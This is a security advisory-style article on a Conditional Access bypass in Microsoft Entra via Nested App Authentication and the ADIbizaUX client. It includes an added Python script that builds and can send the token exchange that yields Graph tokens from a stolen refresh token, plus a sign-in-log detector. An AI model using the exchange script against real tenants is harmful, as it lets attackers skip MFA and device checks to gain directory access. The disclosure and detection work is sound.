Microsoft Entra Conditional Access Policies (CAPs), a core control for securing Azure and Microsoft 365 tenants, can be bypassed through a technique involving Nested App Authentication (NAA). The issue, identified by security researchers, lets an attacker who already holds a particular refresh token obtain access tokens without the policies being evaluated, under the specific conditions described below.
CAPs enforce controls such as multi-factor authentication (MFA), device compliance and location-based restrictions at the point a token is issued, which is what makes them valuable once a user's password has been phished: the attacker has the credential but cannot satisfy the policy. The finding is that Microsoft's non-standard OAuth extension for Single Sign-On (SSO) between its own applications can be used to obtain Microsoft Graph access tokens without a Conditional Access evaluation taking place.
Understanding Nested App Authentication
NAA is a mechanism within Microsoft's SSO system that lets a "host" application, such as the Azure Portal, act as an authentication broker for the applications nested inside it. The user signs in once to the host and can then move between the nested services without further prompts: the host uses its cached refresh token to silently acquire access tokens on behalf of each child application.
Rather than a standard OAuth authorization request, the nested application's token request carries the broker's identity in the brk_client_id and brk_redirect_uri parameters, together with a broker-specific redirect URI, so the refresh token of one client is exchanged for an access token for another client without any user interaction.
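To make the request shape concrete, here is an added example (editor's code, not from the original article or from Microsoft) that builds the NAA refresh-token exchange described above and inspects the claims of whatever access token comes back. The token endpoint and the Azure Portal and ADIbizaUX client IDs are editor-supplied well-known values; the brk-<client_id>://<host> form of the nested application's redirect URI is the editor's understanding of the flow and should be confirmed against a captured request before being relied on. The sample token at the bottom is constructed for local testing and is unsigned.

```python
"""Added example (not from the original article): the shape of a Nested App
Authentication (NAA) refresh-token exchange, plus an offline inspection of the
claims in the access token that such an exchange returns.

Assumptions (editor-supplied, verify against a real request):
  - the v2.0 token endpoint below is the one the exchange is sent to;
  - the nested app's redirect_uri takes the form brk-<broker_client_id>://<host>;
  - the two client IDs are the well-known Azure Portal and ADIbizaUX app IDs.
"""
import base64
import json
import os
import urllib.parse
import urllib.request

TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/token"

# Well-known first-party app IDs (editor-supplied; confirm in your tenant's sign-in logs).
AZURE_PORTAL_CLIENT_ID = "c44b4083-3bb0-49c1-b47d-974e53cbdf3c"  # host / broker
ADIBIZAUX_CLIENT_ID = "74658136-14ec-4630-ad9b-26e160ff0fc6"     # nested app


def build_naa_token_request(refresh_token, nested_client_id=ADIBIZAUX_CLIENT_ID,
                            broker_client_id=AZURE_PORTAL_CLIENT_ID,
                            broker_redirect_uri="https://portal.azure.com/",
                            scope="https://graph.microsoft.com/.default offline_access"):
    """Return the form fields of an NAA token request.

    From the nested app's point of view this is an ordinary refresh_token grant;
    the brk_* fields identify the host whose cached refresh token is being
    brokered, and redirect_uri uses the brk-<broker_client_id>://<host> scheme
    (assumed format, see module docstring).
    """
    host = urllib.parse.urlparse(broker_redirect_uri).netloc
    return {
        "grant_type": "refresh_token",
        "client_id": nested_client_id,
        "refresh_token": refresh_token,
        "scope": scope,
        "brk_client_id": broker_client_id,
        "brk_redirect_uri": broker_redirect_uri,
        "redirect_uri": f"brk-{broker_client_id}://{host}",
    }


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token):
    """Decode, without verifying, the payload of a compact JWT.  Verification is
    deliberately skipped: this is for inspecting a token you already hold."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    return json.loads(_b64url_decode(parts[1]))


def summarize_token(token):
    """Pull out the claims that matter when judging a brokered token: the client
    it was issued to (appid), the resource (aud), the granted scopes (scp) and
    the authentication methods behind the underlying session (amr).  Note that
    amr reflects how the user originally signed in to the host, not whether
    Conditional Access was evaluated for this issuance."""
    claims = decode_jwt_claims(token)
    return {
        "appid": claims.get("appid"),
        "aud": claims.get("aud"),
        "scp": claims.get("scp", "").split(),
        "amr": claims.get("amr", []),
        "upn": claims.get("upn") or claims.get("preferred_username"),
    }


def request_naa_token(refresh_token, **kwargs):
    """Send the exchange over the network; only meaningful with a real token."""
    body = urllib.parse.urlencode(build_naa_token_request(refresh_token, **kwargs)).encode()
    req = urllib.request.Request(TOKEN_ENDPOINT, data=body, method="POST")
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


def make_unsigned_jwt(claims):
    """Build a constructed, unsigned (alg=none) token for local testing only."""
    def enc(obj):
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


# Constructed sample: what a Graph token issued to ADIbizaUX might carry.
SAMPLE_TOKEN = make_unsigned_jwt({
    "aud": "https://graph.microsoft.com",
    "appid": ADIBIZAUX_CLIENT_ID,
    "scp": "Directory.ReadWrite.All Policy.Read.All",
    "amr": ["pwd"],
    "upn": "alice@contoso.example",
})

if __name__ == "__main__":
    rt = os.environ.get("AZURE_PORTAL_REFRESH_TOKEN")
    if rt:
        print(summarize_token(request_naa_token(rt)["access_token"]))
    else:
        print(build_naa_token_request("<refresh-token>"))
        print(summarize_token(SAMPLE_TOKEN))
```

Run without AZURE_PORTAL_REFRESH_TOKEN set, the script only prints the request fields and the constructed sample's claims; the point of summarize_token is that the appid and scp of the returned token tell you which pre-consented permissions a brokered token actually carries.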
The Vulnerability Exploited
The flaw appears when the NAA flow is used with the ADIbizaUX client, the Azure Portal extension behind the portal's identity and access management blades. ADIbizaUX exposes undocumented APIs and carries extensive pre-consented Microsoft Graph permissions, enough to manage users, groups, applications, directory settings and the Conditional Access policies themselves.
The researchers found that when an Azure Portal refresh token is brokered to ADIbizaUX to request a Microsoft Graph token, Conditional Access policies are not evaluated, yet an access token is issued anyway. This contrasts with FOCI (Family of Client IDs) clients such as Microsoft Teams: when a blocking policy is active, the equivalent refresh-token exchange for those clients is blocked as expected. The discrepancy shows the problem is specific to the NAA-based flow and to certain clients, not to refresh-token redemption in general.
Further investigation identified additional Microsoft Intune portal extension applications that can likewise redeem an Azure Portal refresh token via NAA for Microsoft Graph tokens without Conditional Access enforcement.
Potential Attack Scenarios
In a realistic attack, the adversary first needs an Azure Portal refresh token, for example from a phishing campaign or an adversary-in-the-middle (AiTM) proxy placed in front of login.microsoftonline.com. The token's fixed 24-hour lifetime and the fact that it cannot be renewed narrow the window but do not remove the risk.
With that refresh token, the attacker can drive the NAA flow to obtain Graph access tokens, and via the Intune extension applications tokens for further services, without Conditional Access being evaluated. The MFA, device-compliance and location requirements that the policies would normally impose on token issuance are therefore not enforced on the resulting tokens, and the attacker gains access to whatever the pre-consented permissions of those clients allow.
Organizations that rely on Microsoft Entra CAPs should assume tokens can be issued through this path and compensate for it: review non-interactive sign-ins for Microsoft Graph tokens issued to ADIbizaUX and the Intune portal extension applications where Conditional Access shows as not applied, treat Azure Portal refresh tokens as high-value credentials in phishing and AiTM investigations, and track Microsoft's guidance on the issue. Regular monitoring of authentication flows and staying informed about emerging threats remain essential to a robust security posture.
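A starting point for the monitoring recommended above, as an added example (editor's code, not from the article): detection logic over Entra ID sign-in records that flags non-interactive Microsoft Graph token issuances to the NAA-capable clients named in this article when Conditional Access reports "not applied" and none of the policies expected to govern Graph access was evaluated. Field names follow the Microsoft Graph signIn resource returned by GET /auditLogs/signIns. The app IDs are editor-supplied; the Intune extension applications are left for you to add because the article does not name them; and which appId Entra records for a brokered issuance is an assumption to verify in your own tenant. The sample records are constructed.

```python
"""Added example (not from the original article): detection logic over Entra ID
sign-in log records, flagging Microsoft Graph tokens issued to NAA-capable
clients without any Conditional Access policy being evaluated.

Assumptions (editor-supplied): field names follow the Microsoft Graph signIn
resource (GET /auditLogs/signIns); app IDs below are well-known first-party
IDs; a brokered issuance is assumed to be logged under the nested app's appId.
The sample records are constructed, not real logs.
"""
import json
import sys

GRAPH_RESOURCE_ID = "00000003-0000-0000-c000-000000000000"

# Clients the article identifies as able to redeem an Azure Portal refresh token
# via NAA.  The Intune portal extension apps are not named in the article; add
# their IDs here once identified in your tenant.
WATCHED_NESTED_APPS = {
    "74658136-14ec-4630-ad9b-26e160ff0fc6": "ADIbizaUX",
}


def load_signins(graph_json_text):
    """Parse the JSON body of a GET /auditLogs/signIns response."""
    return json.loads(graph_json_text).get("value", [])


def ca_was_evaluated(record, expected_policies):
    """True if at least one policy we expect to govern Graph access appears in
    appliedConditionalAccessPolicies with a result other than notApplied."""
    for policy in record.get("appliedConditionalAccessPolicies", []):
        if (policy.get("displayName") in expected_policies
                and policy.get("result") != "notApplied"):
            return True
    return False


def flag_unevaluated_graph_tokens(records, expected_policies, watched=WATCHED_NESTED_APPS):
    """Return (record, reason) pairs for non-interactive Graph token issuances to a
    watched nested app where conditionalAccessStatus is notApplied and none of the
    expected policies was evaluated.  Interactive sign-ins and other resources are
    ignored, and CA failures are not flagged: those show the policy working."""
    findings = []
    for record in records:
        if record.get("resourceId") != GRAPH_RESOURCE_ID or record.get("isInteractive"):
            continue
        app_name = watched.get(record.get("appId"))
        if app_name is None:
            continue
        if (record.get("conditionalAccessStatus") == "notApplied"
                and not ca_was_evaluated(record, expected_policies)):
            reason = (f"{record.get('createdDateTime')}: Graph token issued to {app_name} "
                      f"for {record.get('userPrincipalName')} from {record.get('ipAddress')} "
                      f"with no Conditional Access evaluation")
            findings.append((record, reason))
    return findings


EXPECTED_POLICIES = {"Require compliant device for Graph"}

# Constructed sample records, mimicking the fields of the signIn resource.
SAMPLE_SIGNINS = [
    {   # FOCI client (Teams): refresh blocked by the policy, as the article describes
        "id": "sample-1", "createdDateTime": "2025-01-10T08:00:00Z",
        "userPrincipalName": "alice@contoso.example", "ipAddress": "203.0.113.7",
        "appId": "1fec8e78-bce4-4aaf-ab1b-5451cc387264", "appDisplayName": "Microsoft Teams",
        "resourceId": GRAPH_RESOURCE_ID, "isInteractive": False,
        "conditionalAccessStatus": "failure",
        "appliedConditionalAccessPolicies": [
            {"displayName": "Require compliant device for Graph", "result": "failure"}],
    },
    {   # NAA path: Graph token to ADIbizaUX with CA not evaluated at all
        "id": "sample-2", "createdDateTime": "2025-01-10T08:01:00Z",
        "userPrincipalName": "alice@contoso.example", "ipAddress": "203.0.113.7",
        "appId": "74658136-14ec-4630-ad9b-26e160ff0fc6", "appDisplayName": "ADIbizaUX",
        "resourceId": GRAPH_RESOURCE_ID, "isInteractive": False,
        "conditionalAccessStatus": "notApplied",
        "appliedConditionalAccessPolicies": [],
    },
    {   # Same app, but the policy was evaluated and satisfied: benign
        "id": "sample-3", "createdDateTime": "2025-01-10T09:00:00Z",
        "userPrincipalName": "bob@contoso.example", "ipAddress": "198.51.100.4",
        "appId": "74658136-14ec-4630-ad9b-26e160ff0fc6", "appDisplayName": "ADIbizaUX",
        "resourceId": GRAPH_RESOURCE_ID, "isInteractive": False,
        "conditionalAccessStatus": "success",
        "appliedConditionalAccessPolicies": [
            {"displayName": "Require compliant device for Graph", "result": "success"}],
    },
    {   # Interactive Azure Portal sign-in: out of scope for this detector
        "id": "sample-4", "createdDateTime": "2025-01-10T07:59:00Z",
        "userPrincipalName": "alice@contoso.example", "ipAddress": "203.0.113.7",
        "appId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appDisplayName": "Azure Portal",
        "resourceId": GRAPH_RESOURCE_ID, "isInteractive": True,
        "conditionalAccessStatus": "success",
        "appliedConditionalAccessPolicies": [
            {"displayName": "Require compliant device for Graph", "result": "success"}],
    },
]
SAMPLE_GRAPH_RESPONSE = json.dumps({"value": SAMPLE_SIGNINS})

if __name__ == "__main__":
    # Usage: python detect_naa.py signins.json   (a saved /auditLogs/signIns response)
    records = load_signins(open(sys.argv[1]).read()) if len(sys.argv) > 1 else SAMPLE_SIGNINS
    for _, reason in flag_unevaluated_graph_tokens(records, EXPECTED_POLICIES):
        print(reason)
```

The detector keys on the combination that the article describes as anomalous, a Graph token to one of these clients with no policy evaluated, rather than on conditionalAccessStatus alone, because "notApplied" is also what you see for users legitimately outside every policy's scope; feeding it the display names of the policies that should cover the user keeps that case out of the alert.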